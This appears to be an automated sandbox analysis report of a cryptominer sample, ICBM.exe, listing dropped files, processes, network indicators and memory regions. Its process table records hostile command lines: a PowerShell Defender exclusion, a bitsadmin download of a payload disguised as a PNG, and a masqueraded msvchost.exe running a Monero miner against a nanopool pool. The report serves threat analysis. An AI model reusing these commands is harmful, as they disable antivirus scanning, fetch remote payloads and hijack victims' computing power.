Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
ICBM.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
initial sample
|
 |
|
|
C:\Windows\System32\WinRing0x64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\msvchost.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\IT\service_log.txt
|
ASCII text, with very long lines (1157)
|
modified
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xd3882308, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Windows\BIT68D4.tmp
|
PNG image data, 8386 x 2229, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_i3meus3n.kc0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_nw2jrtiw.4f0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_tnq1uyzk.rif.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_v2txz2bi.k51.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\img.png (copy)
|
PNG image data, 8386 x 2229, 8-bit/color RGBA, non-interlaced
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\ICBM.exe
|
"C:\Users\user\Desktop\ICBM.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Users\user\Desktop\ICBM.exe
|
C:\Users\user\Desktop\ICBM.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\""
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\bitsadmin.exe
|
"bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png
C:\Windows\img.png
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\msvchost.exe
|
C:\Windows\System32\msvchost.exe -o xmr-eu2.nanopool.org:14433 -u 49QjJy47SU1MGFX7Rep7TQUkGUvvTRqSx4HhzqBgMNwtRvxsXMd98sFZLULDV61ncxVr5kazj9asqctBxy6hWm462wGcBQT
--tls --coin monero
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\sc.exe
|
"sc" start my_system_service
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\cmd.exe
|
C:\Windows\System32\cmd.exe
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724
|
unknown
|
|
|
|
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png
|
104.26.9.242
|
|
|
|
https://dl.imgdrop.io/
|
unknown
|
|
|
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
https://github.com/clap-rs/clap/issuesC:
|
unknown
|
||
|
https://dl.imgdrop.io:443/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c377212042
|
unknown
|
||
|
http://ns.adobe.assertion
|
unknown
|
||
|
http://ocsp.cloudflare.com/origin_ca0
|
unknown
|
||
|
http://crl.cloudflare.com/origin_ca.crl
|
unknown
|
||
|
https://docs.rs/getrandom#nodejs-es-module-support
|
unknown
|
||
|
https://xmrig.com/docs/algorithms
|
unknown
|
||
|
https://github.com/clap-rs/clap/issues-
|
unknown
|
||
|
http://crl.cloudflare.com/origin_ca.crl0
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
http://ocsp.cloudflare.com/origin_ca
|
unknown
|
||
|
http://www.quovadis.bm0
|
unknown
|
||
|
https://xmrig.com/benchmark/%s
|
unknown
|
||
|
https://xmrig.com/wizard
|
unknown
|
||
|
https://ocsp.quovadisoffshore.com0
|
unknown
|
||
|
https://github.com/clap-rs/clap/issues
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
dl.imgdrop.io
|
104.26.9.242
|
|
|
|
xmr-eu2.nanopool.org
|
51.210.150.92
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.26.9.242
|
dl.imgdrop.io
|
United States
|
|
|
|
51.15.89.13
|
unknown
|
France
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_USERS.DEFAULT\Software\Classes\Local Settings\MuiCache\e\52C64B7E
|
@%ProgramFiles%\Windows Defender\MpAsDesc.dll,-300
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1BC2473B000
|
heap
|
page read and write
|
|
|
|
1C5A7157000
|
heap
|
page read and write
|
|
|
|
1C5A70FC000
|
heap
|
page read and write
|
|
|
|
7FF678047000
|
unkown
|
page readonly
|
|
|
|
7FF6784D0000
|
unkown
|
page readonly
|
|
|
|
1C5A7167000
|
heap
|
page read and write
|
|
|
|
1C5A7133000
|
heap
|
page read and write
|
|
|
|
1C5A8C54000
|
direct allocation
|
page execute and read and write
|
||
|
173B2FC000
|
stack
|
page read and write
|
||
|
22D94C93000
|
heap
|
page read and write
|
||
|
22D9EAD0000
|
trusted library allocation
|
page read and write
|
||
|
21AA1550000
|
heap
|
page read and write
|
||
|
37048FE000
|
stack
|
page read and write
|
||
|
22D94CDB000
|
heap
|
page read and write
|
||
|
22D968F5000
|
heap
|
page read and write
|
||
|
22D9EAB0000
|
trusted library allocation
|
page read and write
|
||
|
22D9EA10000
|
trusted library allocation
|
page read and write
|
||
|
37051FF000
|
stack
|
page read and write
|
||
|
1C5AB600000
|
direct allocation
|
page read and write
|
||
|
22D963C0000
|
trusted library allocation
|
page read and write
|
||
|
DFAC3FE000
|
stack
|
page read and write
|
||
|
18C2A1A0000
|
unkown
|
page read and write
|
||
|
18C28430000
|
unkown
|
page read and write
|
||
|
21AA1820000
|
heap
|
page read and write
|
||
|
1ABC93E000
|
unkown
|
page read and write
|
||
|
7FF601890000
|
unkown
|
page readonly
|
||
|
22D94B80000
|
heap
|
page read and write
|
||
|
3B2AF7E000
|
stack
|
page read and write
|
||
|
3704EFE000
|
stack
|
page read and write
|
||
|
22D9EB80000
|
trusted library allocation
|
page read and write
|
||
|
1C5AA200000
|
direct allocation
|
page read and write
|
||
|
37055FF000
|
stack
|
page read and write
|
||
|
1BC183B7000
|
heap
|
page read and write
|
||
|
1BC19B82000
|
heap
|
page read and write
|
||
|
173B4FE000
|
stack
|
page read and write
|
||
|
22D94CC5000
|
heap
|
page read and write
|
||
|
18C2A586000
|
unkown
|
page read and write
|
||
|
4BDA67F000
|
stack
|
page read and write
|
||
|
22D94C9A000
|
heap
|
page read and write
|
||
|
3F1E4FF000
|
stack
|
page read and write
|
||
|
37054FF000
|
stack
|
page read and write
|
||
|
37052FE000
|
stack
|
page read and write
|
||
|
22D94C91000
|
heap
|
page read and write
|
||
|
22D95502000
|
heap
|
page read and write
|
||
|
22D9F000000
|
heap
|
page read and write
|
||
|
18C28440000
|
heap
|
page read and write
|
||
|
22D94D02000
|
heap
|
page read and write
|
||
|
7FF601AEB000
|
unkown
|
page readonly
|
||
|
1BC18550000
|
heap
|
page read and write
|
||
|
18C2A28E000
|
unkown
|
page read and write
|
||
|
1BC19182000
|
heap
|
page read and write
|
||
|
22D9EAE4000
|
trusted library allocation
|
page read and write
|
||
|
18C2A502000
|
unkown
|
page read and write
|
||
|
18C28670000
|
heap
|
page read and write
|
||
|
37022FE000
|
stack
|
page read and write
|
||
|
1C5A8D96000
|
direct allocation
|
page execute and read and write
|
||
|
22D953A0000
|
trusted library section
|
page read and write
|
||
|
22D94CB9000
|
heap
|
page read and write
|
||
|
1243F7F0000
|
heap
|
page read and write
|
||
|
DFAB6DB000
|
stack
|
page read and write
|
||
|
37049FE000
|
stack
|
page read and write
|
||
|
1BC18630000
|
heap
|
page read and write
|
||
|
22D96864000
|
heap
|
page read and write
|
||
|
1C5A8BA0000
|
direct allocation
|
page execute and read and write
|
||
|
1C5A8D44000
|
heap
|
page read and write
|
||
|
3F1E3FF000
|
stack
|
page read and write
|
||
|
3703DFE000
|
stack
|
page read and write
|
||
|
37056FF000
|
stack
|
page read and write
|
||
|
1ABCC7C000
|
unkown
|
page read and write
|
||
|
1BC18635000
|
heap
|
page read and write
|
||
|
37020FE000
|
stack
|
page read and write
|
||
|
22D9EC60000
|
remote allocation
|
page read and write
|
||
|
3B2B07E000
|
stack
|
page read and write
|
||
|
7FF601AEB000
|
unkown
|
page readonly
|
||
|
18C2A58B000
|
unkown
|
page read and write
|
||
|
1656B7C6000
|
heap
|
page read and write
|
||
|
3704DFE000
|
stack
|
page read and write
|
||
|
1243F650000
|
heap
|
page read and write
|
||
|
37035FE000
|
stack
|
page read and write
|
||
|
22D9EC10000
|
trusted library allocation
|
page read and write
|
||
|
22D9EAD0000
|
trusted library allocation
|
page read and write
|
||
|
22D96A00000
|
trusted library allocation
|
page read and write
|
||
|
DFABE7A000
|
stack
|
page read and write
|
||
|
3704CFE000
|
stack
|
page read and write
|
||
|
1656B8C0000
|
heap
|
page read and write
|
||
|
7FF601890000
|
unkown
|
page readonly
|
||
|
DFAC57F000
|
stack
|
page read and write
|
||
|
1C5AC000000
|
direct allocation
|
page read and write
|
||
|
37025FD000
|
stack
|
page read and write
|
||
|
22D9EAE0000
|
trusted library allocation
|
page read and write
|
||
|
22D94C70000
|
heap
|
page read and write
|
||
|
1BC1D8E3000
|
heap
|
page read and write
|
||
|
18C28400000
|
unkown
|
page readonly
|
||
|
DFAC47F000
|
stack
|
page read and write
|
||
|
7FF601890000
|
unkown
|
page readonly
|
||
|
18C2A4A0000
|
unkown
|
page read and write
|
||
|
1C5A8D85000
|
direct allocation
|
page execute and read and write
|
||
|
3B2AEFF000
|
stack
|
page read and write
|
||
|
22D95519000
|
heap
|
page read and write
|
||
|
1656B810000
|
heap
|
page read and write
|
||
|
21AA1895000
|
heap
|
page read and write
|
||
|
DFAC1FC000
|
stack
|
page read and write
|
||
|
22D962C0000
|
trusted library section
|
page readonly
|
||
|
22D9EB70000
|
trusted library allocation
|
page read and write
|
||
|
1656B7C0000
|
heap
|
page read and write
|
||
|
18C2A302000
|
unkown
|
page read and write
|
||
|
7FF601A4D000
|
unkown
|
page readonly
|
||
|
3704AFE000
|
stack
|
page read and write
|
||
|
22D95415000
|
heap
|
page read and write
|
||
|
18C286B5000
|
heap
|
page read and write
|
||
|
22D94B60000
|
unclassified section
|
page readonly
|
||
|
22D9EABC000
|
trusted library allocation
|
page read and write
|
||
|
22D94D13000
|
heap
|
page read and write
|
||
|
18C2A544000
|
unkown
|
page read and write
|
||
|
22D9EA20000
|
trusted library allocation
|
page read and write
|
||
|
22D9EBF0000
|
trusted library allocation
|
page read and write
|
||
|
22D9F010000
|
heap
|
page read and write
|
||
|
18C28447000
|
heap
|
page read and write
|
||
|
22D94C8C000
|
heap
|
page read and write
|
||
|
22D96270000
|
trusted library section
|
page readonly
|
||
|
1C5AFC00000
|
direct allocation
|
page read and write
|
||
|
22D94C13000
|
heap
|
page read and write
|
||
|
DFAC5FE000
|
stack
|
page read and write
|
||
|
21AA15E9000
|
heap
|
page read and write
|
||
|
DFAC07F000
|
stack
|
page read and write
|
||
|
22D96843000
|
heap
|
page read and write
|
||
|
7FF601A4D000
|
unkown
|
page readonly
|
||
|
1BC18417000
|
heap
|
page read and write
|
||
|
37023FE000
|
stack
|
page read and write
|
||
|
37046FB000
|
stack
|
page read and write
|
||
|
DFABB78000
|
stack
|
page read and write
|
||
|
22D9EAC3000
|
trusted library allocation
|
page read and write
|
||
|
22D94CC9000
|
heap
|
page read and write
|
||
|
22D94C2A000
|
heap
|
page read and write
|
||
|
18C2A47A000
|
unkown
|
page read and write
|
||
|
1C5A8D5C000
|
heap
|
page read and write
|
||
|
7FF6781EF000
|
unkown
|
page write copy
|
||
|
22D9EAB9000
|
trusted library allocation
|
page read and write
|
||
|
22D9EAC6000
|
trusted library allocation
|
page read and write
|
||
|
1BC183A4000
|
heap
|
page read and write
|
||
|
1C5ADE00000
|
direct allocation
|
page read and write
|
||
|
1C5A8D3C000
|
heap
|
page read and write
|
||
|
22D94CB3000
|
heap
|
page read and write
|
||
|
22D949F0000
|
heap
|
page read and write
|
||
|
21AA15E0000
|
heap
|
page read and write
|
||
|
22D96854000
|
heap
|
page read and write
|
||
|
37047FF000
|
stack
|
page read and write
|
||
|
1243F55B000
|
heap
|
page read and write
|
||
|
1C5A8C33000
|
direct allocation
|
page execute and read and write
|
||
|
22D96100000
|
trusted library allocation
|
page read and write
|
||
|
1C5A8D34000
|
heap
|
page read and write
|
||
|
1C5A71D8000
|
heap
|
page read and write
|
||
|
1C5A9800000
|
direct allocation
|
page read and write
|
||
|
1C5A8DB7000
|
direct allocation
|
page execute and read and write
|
||
|
22D95500000
|
heap
|
page read and write
|
||
|
1BC18300000
|
heap
|
page read and write
|
||
|
1BC183AE000
|
heap
|
page read and write
|
||
|
22D9689F000
|
heap
|
page read and write
|
||
|
7FF601AEA000
|
unkown
|
page write copy
|
||
|
1BC183B4000
|
heap
|
page read and write
|
||
|
22D9EAA0000
|
trusted library allocation
|
page read and write
|
||
|
22D9559B000
|
heap
|
page read and write
|
||
|
1BC1A582000
|
heap
|
page read and write
|
||
|
1BC1ECE3000
|
heap
|
page read and write
|
||
|
22D962B0000
|
trusted library section
|
page readonly
|
||
|
1C5A8E00000
|
direct allocation
|
page read and write
|
||
|
22D9EAA0000
|
trusted library allocation
|
page read and write
|
||
|
22D9EAC9000
|
trusted library allocation
|
page read and write
|
||
|
22D94C7C000
|
heap
|
page read and write
|
||
|
22D96280000
|
trusted library section
|
page readonly
|
||
|
1ABCBFD000
|
unkown
|
page read and write
|
||
|
7FF601891000
|
unkown
|
page execute read
|
||
|
7FF677C20000
|
unkown
|
page readonly
|
||
|
22D96800000
|
heap
|
page read and write
|
||
|
1243F576000
|
heap
|
page read and write
|
||
|
1C5A8D2C000
|
heap
|
page read and write
|
||
|
18C28540000
|
unkown
|
page read and write
|
||
|
DFAC27E000
|
stack
|
page read and write
|
||
|
18C28A51000
|
unkown
|
page readonly
|
||
|
22D9EB70000
|
trusted library allocation
|
page read and write
|
||
|
22D96895000
|
heap
|
page read and write
|
||
|
4BDA39E000
|
stack
|
page read and write
|
||
|
1BC18782000
|
heap
|
page read and write
|
||
|
7FF601A4D000
|
unkown
|
page readonly
|
||
|
18C2A364000
|
unkown
|
page read and write
|
||
|
1C5A8C44000
|
direct allocation
|
page execute and read and write
|
||
|
18C2A498000
|
unkown
|
page read and write
|
||
|
22D96A10000
|
trusted library allocation
|
page read and write
|
||
|
7FF677C21000
|
unkown
|
page execute read
|
||
|
1C5B0600000
|
direct allocation
|
page read and write
|
||
|
1C5A8C23000
|
direct allocation
|
page execute and read and write
|
||
|
22D9EAA1000
|
trusted library allocation
|
page read and write
|
||
|
7FF601AEB000
|
unkown
|
page readonly
|
||
|
22D9689C000
|
heap
|
page read and write
|
||
|
1C5A7060000
|
heap
|
page read and write
|
||
|
3F1E2FC000
|
stack
|
page read and write
|
||
|
18C2A564000
|
unkown
|
page read and write
|
||
|
22D96968000
|
heap
|
page read and write
|
||
|
22D96A03000
|
trusted library allocation
|
page read and write
|
||
|
3B2AFFC000
|
stack
|
page read and write
|
||
|
22D94CF9000
|
heap
|
page read and write
|
||
|
22D94A00000
|
unclassified section
|
page readonly
|
||
|
1BC1AF82000
|
heap
|
page read and write
|
||
|
1C5A8D1C000
|
heap
|
page read and write
|
||
|
22D94A60000
|
heap
|
page read and write
|
||
|
1ABC938000
|
unkown
|
page read and write
|
||
|
37025FB000
|
stack
|
page read and write
|
||
|
7FF601A93000
|
unkown
|
page readonly
|
||
|
22D9687F000
|
heap
|
page read and write
|
||
|
37045FE000
|
stack
|
page read and write
|
||
|
7FF6784CA000
|
unkown
|
page execute read
|
||
|
1C5A8BC0000
|
direct allocation
|
page execute and read and write
|
||
|
1C5A72C0000
|
heap
|
page read and write
|
||
|
1C5A8C70000
|
heap
|
page read and write
|
||
|
22D968D0000
|
heap
|
page read and write
|
||
|
22D95519000
|
heap
|
page read and write
|
||
|
22D94CEE000
|
heap
|
page read and write
|
||
|
1C5A8D4C000
|
heap
|
page read and write
|
||
|
1C5A8AE0000
|
heap
|
page read and write
|
||
|
1C5A8CB0000
|
heap
|
page read and write
|
||
|
22D9EA90000
|
trusted library allocation
|
page read and write
|
||
|
37053FF000
|
stack
|
page read and write
|
||
|
22D9EAC0000
|
trusted library allocation
|
page read and write
|
||
|
1BC18380000
|
heap
|
page read and write
|
||
|
1C5A8C6D000
|
heap
|
page read and write
|
||
|
18C28411000
|
unkown
|
page readonly
|
||
|
1C5ACA00000
|
direct allocation
|
page read and write
|
||
|
1C5A8BD0000
|
direct allocation
|
page execute and read and write
|
||
|
1656B7FE000
|
heap
|
page read and write
|
||
|
1ABCB7E000
|
unkown
|
page read and write
|
||
|
18C283F0000
|
unkown
|
page readonly
|
||
|
7FF601AEA000
|
unkown
|
page write copy
|
||
|
1BC183B1000
|
heap
|
page read and write
|
||
|
7FF601A93000
|
unkown
|
page readonly
|
||
|
1C5A8D54000
|
heap
|
page read and write
|
||
|
1C5AF200000
|
direct allocation
|
page read and write
|
||
|
7FF601AEA000
|
unkown
|
page read and write
|
||
|
1C5A8C12000
|
direct allocation
|
page execute and read and write
|
||
|
22D967E1000
|
trusted library allocation
|
page read and write
|
||
|
22D968B6000
|
heap
|
page read and write
|
||
|
1C5A8D6C000
|
heap
|
page read and write
|
||
|
1BC183B7000
|
heap
|
page read and write
|
||
|
22D94CD2000
|
heap
|
page read and write
|
||
|
1C5A8DC7000
|
direct allocation
|
page execute and read and write
|
||
|
1C5A8CFD000
|
heap
|
page read and write
|
||
|
22D9695F000
|
heap
|
page read and write
|
||
|
22D95400000
|
heap
|
page read and write
|
||
|
22D9EAAA000
|
trusted library allocation
|
page read and write
|
||
|
7FF601891000
|
unkown
|
page execute read
|
||
|
3B2AB39000
|
stack
|
page read and write
|
||
|
22D9EA80000
|
trusted library allocation
|
page read and write
|
||
|
1BC183B4000
|
heap
|
page read and write
|
||
|
1243F470000
|
heap
|
page read and write
|
||
|
21AA17B0000
|
heap
|
page read and write
|
||
|
22D9EAB3000
|
trusted library allocation
|
page read and write
|
||
|
18C2A410000
|
unkown
|
page read and write
|
||
|
3B2ABBF000
|
stack
|
page read and write
|
||
|
1BC183A7000
|
heap
|
page read and write
|
||
|
3704FFF000
|
stack
|
page read and write
|
||
|
1C5AD400000
|
direct allocation
|
page read and write
|
||
|
1BC1E2E3000
|
heap
|
page read and write
|
||
|
22D9EAB6000
|
trusted library allocation
|
page read and write
|
||
|
37046FE000
|
stack
|
page read and write
|
||
|
1C5A8C65000
|
heap
|
page read and write
|
||
|
1C5A8D75000
|
direct allocation
|
page execute and read and write
|
||
|
22D9EBF0000
|
trusted library allocation
|
page read and write
|
||
|
22D94C6F000
|
heap
|
page read and write
|
||
|
1656B804000
|
heap
|
page read and write
|
||
|
7FF67849F000
|
unkown
|
page readonly
|
||
|
1C5A8D64000
|
heap
|
page read and write
|
||
|
1C5A8BF1000
|
direct allocation
|
page execute and read and write
|
||
|
18C2A2A0000
|
unkown
|
page read and write
|
||
|
1656B640000
|
heap
|
page read and write
|
||
|
22D9EC00000
|
trusted library allocation
|
page read and write
|
||
|
7FF601AEB000
|
unkown
|
page readonly
|
||
|
22D95513000
|
heap
|
page read and write
|
||
|
1BC183C7000
|
heap
|
page read and write
|
||
|
18C2A5CC000
|
unkown
|
page read and write
|
||
|
1C5A8C60000
|
heap
|
page read and write
|
||
|
22D9EC60000
|
remote allocation
|
page read and write
|
||
|
173B5FE000
|
stack
|
page read and write
|
||
|
7FF601891000
|
unkown
|
page execute read
|
||
|
DFAC2FF000
|
stack
|
page read and write
|
||
|
DFABF7C000
|
stack
|
page read and write
|
||
|
1C5A8C02000
|
direct allocation
|
page execute and read and write
|
||
|
1656BA40000
|
heap
|
page read and write
|
||
|
1C5A70F0000
|
heap
|
page read and write
|
||
|
7FF601890000
|
unkown
|
page readonly
|
||
|
22D94C40000
|
heap
|
page read and write
|
||
|
22D94C6B000
|
heap
|
page read and write
|
||
|
18C285B0000
|
unkown
|
page read and write
|
||
|
1BC183B7000
|
heap
|
page read and write
|
||
|
22D9EC60000
|
remote allocation
|
page read and write
|
||
|
1BC18389000
|
heap
|
page read and write
|
||
|
22D94CC1000
|
heap
|
page read and write
|
||
|
22D96892000
|
heap
|
page read and write
|
||
|
22D968A3000
|
heap
|
page read and write
|
||
|
21AA1890000
|
heap
|
page read and write
|
||
|
22D94C00000
|
heap
|
page read and write
|
||
|
3F1E5FF000
|
stack
|
page read and write
|
||
|
7FF601A93000
|
unkown
|
page readonly
|
||
|
1C5A8DA6000
|
direct allocation
|
page execute and read and write
|
||
|
1BC185C0000
|
heap
|
page read and write
|
||
|
DFAC0FE000
|
stack
|
page read and write
|
||
|
22D9EE50000
|
trusted library allocation
|
page read and write
|
||
|
3704BFF000
|
stack
|
page read and write
|
||
|
1BC18408000
|
heap
|
page read and write
|
||
|
37021FF000
|
stack
|
page read and write
|
||
|
173B3FE000
|
stack
|
page read and write
|
||
|
22D94CAF000
|
heap
|
page read and write
|
||
|
22D9EBE0000
|
trusted library allocation
|
page read and write
|
||
|
3F1E6FC000
|
stack
|
page read and write
|
||
|
1243F550000
|
heap
|
page read and write
|
||
|
1BC183BF000
|
heap
|
page read and write
|
||
|
7FF601A93000
|
unkown
|
page readonly
|
||
|
22D94C59000
|
heap
|
page read and write
|
||
|
DFABC7E000
|
stack
|
page read and write
|
||
|
22D96290000
|
trusted library section
|
page readonly
|
||
|
3702DFC000
|
stack
|
page read and write
|
||
|
22D96874000
|
heap
|
page read and write
|
||
|
1C5AAC00000
|
direct allocation
|
page read and write
|
||
|
1C5A8D00000
|
heap
|
page read and write
|
||
|
18C2A3C6000
|
unkown
|
page read and write
|
||
|
7FF601891000
|
unkown
|
page execute read
|
||
|
7FF601A4D000
|
unkown
|
page readonly
|
||
|
1C5A8BE1000
|
direct allocation
|
page execute and read and write
|
||
|
1656B930000
|
heap
|
page read and write
|
||
|
1C5A71D4000
|
heap
|
page read and write
|
||
|
18C286B0000
|
heap
|
page read and write
|
||
|
4BDA31D000
|
stack
|
page read and write
|
||
|
1C5A8BAF000
|
direct allocation
|
page execute and read and write
|
||
|
1243F340000
|
heap
|
page read and write
|
||
|
1BC183B4000
|
heap
|
page read and write
|
||
|
7FF601AEA000
|
unkown
|
page read and write
|
||
|
1656B80E000
|
heap
|
page read and write
|
||
|
1BC1B982000
|
heap
|
page read and write
|
||
|
22D94C96000
|
heap
|
page read and write
|
||
|
1C5A8B50000
|
direct allocation
|
page execute read
|
||
|
1ABC940000
|
unkown
|
page read and write
|
||
|
37024FE000
|
stack
|
page read and write
|
||
|
1BC1CEE3000
|
heap
|
page read and write
|
||
|
22D9EBD0000
|
trusted library allocation
|
page read and write
|
||
|
22D9688A000
|
heap
|
page read and write
|
||
|
1C5A8D24000
|
heap
|
page read and write
|
||
|
3B2AE7E000
|
stack
|
page read and write
|
||
|
22D9EAA4000
|
trusted library allocation
|
page read and write
|
||
|
22D9EAAD000
|
trusted library allocation
|
page read and write
|
||
|
22D9EABF000
|
trusted library allocation
|
page read and write
|
||
|
DFABD79000
|
stack
|
page read and write
|
||
|
1BC183AF000
|
heap
|
page read and write
|
||
|
22D94C31000
|
heap
|
page read and write
|
||
|
1BC1F6E3000
|
heap
|
page read and write
|
||
|
22D962A0000
|
trusted library section
|
page readonly
|
||
|
DFAC9FF000
|
stack
|
page read and write
|
||
|
22D94BD0000
|
trusted library allocation
|
page read and write
|
||
|
37050FE000
|
stack
|
page read and write
|
||
|
22D96902000
|
heap
|
page read and write
|
||
|
DFABFFF000
|
stack
|
page read and write
|
||
|
1C5AE800000
|
direct allocation
|
page read and write
|
||
|
18C282E0000
|
heap
|
page read and write
|
||
|
1C5A8CF0000
|
heap
|
page read and write
|
||
|
DFAC6FB000
|
stack
|
page read and write
|
||
|
22D968F1000
|
heap
|
page read and write
|
||
|
22D94B70000
|
unclassified section
|
page readonly
|
||
|
1656B7E9000
|
heap
|
page read and write
|
||
|
22D94C81000
|
heap
|
page read and write
|
||
|
3701BAA000
|
stack
|
page read and write
|
||
|
1656BA45000
|
heap
|
page read and write
|
||
|
22D96881000
|
heap
|
page read and write
|
||
|
22D95402000
|
heap
|
page read and write
|
||
|
1C5A8BA8000
|
direct allocation
|
page execute and read and write
|
There are 361 hidden memdumps, click here to show them.